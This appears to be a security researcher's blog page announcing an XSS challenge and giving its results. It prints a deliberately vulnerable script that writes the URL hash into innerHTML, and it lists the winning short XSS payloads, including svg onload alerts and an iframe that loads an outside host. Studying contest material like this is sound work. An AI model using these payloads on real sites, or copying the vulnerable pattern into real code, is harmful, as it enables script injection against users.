David Sopas – Web Security Researcher

Challenge

19/08/15 Bug Bounty , Challenge # , , , , ,

Results for the XSS challenge

For the first challenge it was very interesting. It was easy challenge but it’s a start. New challenges will be up soon.

The winners are [they were the first ones to give one solution]:

1º Luciano Corsalini – $50 Amazon gift card

#<svg/onload=alert(`xss`)>

2º Kenan – $25 Amazon gift card

#<svg/onload=alert(/xss/)>

For the bonus prize it wasn’t easy to choose. I decided to give $25 Amazon gift card to the most creative XSS vector.

The winner was Abdulrahman Alqabandi

#<iframe/src=//14.rs>

Also I would like to share another pretty good solution from Ashar Javed:

<p/oncut=alert`xss`>x

Congratulations to the winners and to all participants. Thanks for your time and effort.
Winners will be contacted soon by email.

 

0 likes 3 responses
14/08/15 Challenge # ,

Win $50 Amazon Gift card with a XSS challenge

Win $50 Amazon Gift card with a XSS challenge

I’m a big fan of XSS and to make my new website more visible to the infosec guys I’m offering two Amazon gift cards.
The first correct solution will have a $50 Amazon Gift card. The second one will receive $25 Amazon Gift card.

The rules are simple (like the challenge). Show a alert box in the following vulnerable code with a message containing the word xss.

<script>
function go()
{
var w = location.hash;
w = w.replace(/['", ]+/g, "");
document.getElementById("say").innerHTML = w.substring(0,26);
}
</script>

<div id="say"></div>

<a onclick="go()">Say it</a> 

Rules:

  • You can’t use some of the chars represented in the w.replace line of code
  • You can only use Chrome, Firefox, Opera, Internet Explorer or Safari latest versions
  • XSS vector must be less or equal to 26 chars long
  • When commenting your entry use the [ code]code[ /code] to write your code (without the leading space)

The challenge will end on 19 august at midnight. All the solutions must be added in this post comments.
All the comments will be inactive until the challenge finishes.

UPDATE: I’ll give a bonus to the user who replies with the most creative XSS.

Good luck! Happy hunting 🙂

0 likes 16 responses